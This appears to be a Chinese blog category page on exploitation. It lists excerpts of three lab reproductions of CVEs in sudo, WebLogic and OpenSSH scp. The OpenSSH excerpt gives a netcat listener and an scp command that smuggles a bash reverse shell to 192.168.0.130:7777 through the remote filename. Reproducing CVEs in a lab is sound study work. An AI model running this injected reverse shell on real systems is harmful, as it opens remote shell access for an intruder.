![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
漏洞利用
文章平均质量分 79
安服仔
你远没有自己想象中那么努力
展开
-
复现--Linux sudo权限提升漏洞(CVE-2021-3156)
前言网上已经有了很多的相关复现文章,但是还是有一些疑问,比如:普通用户如果有sudo权限的话,已经可以执行root用户能执行的命令,再去提权好像意义不大环境准备华为云VPS(Ubuntu 18.04.4 LTS、Sudo version 1.8.21p2)创建新用户test-1(无sudo权限)下载大佬的EXP(没办法,自己太菜了)开始提权test-1@dreamer:/home$ cd test-1/test-1@dreamer:~$ lsCVE-2021-3156原创 2021-01-31 22:28:19 · 2140 阅读 · 2 评论 -
Weblogic LDAP 远程代码执行漏洞(CVE-2021-2109)
CVE-2021-2109 Weblogic Server远程代码执行漏洞影响范围WebLogic Server 10.3.6.0.0WebLogic Server 12.1.3.0.0WebLogic Server 12.2.1.3.0WebLogic Server 12.2.1.4.0WebLogic Server 14.1.1.0.0环境搭建这个怎么搭都行,推荐采用docker镜像,例如以下两个docker镜像采用vulhub/weblogic/CVE-2020-14882的镜像(原创 2021-01-26 02:18:43 · 1225 阅读 · 0 评论 -
(CVE-2020-15778)OpenSSH_8.3-命令注入漏洞复现
攻击方监听端口:#使用一个窗口开启nc进行监听nc -lvvp 7777#开启另一个窗口,上传反弹shell的命令scp dic.txt root@192.168.0.187:'`bash -i >& /dev/tcp/192.168.0.130/7777 0>&1`/tmp/attack.txt'更改默认shell命令设zsh为默认shell:chsh -s /bin/zsh设bash为默认shell: chsh -s /bin/bash问:不能用zsh反弹原创 2021-02-01 22:44:21 · 2014 阅读 · 0 评论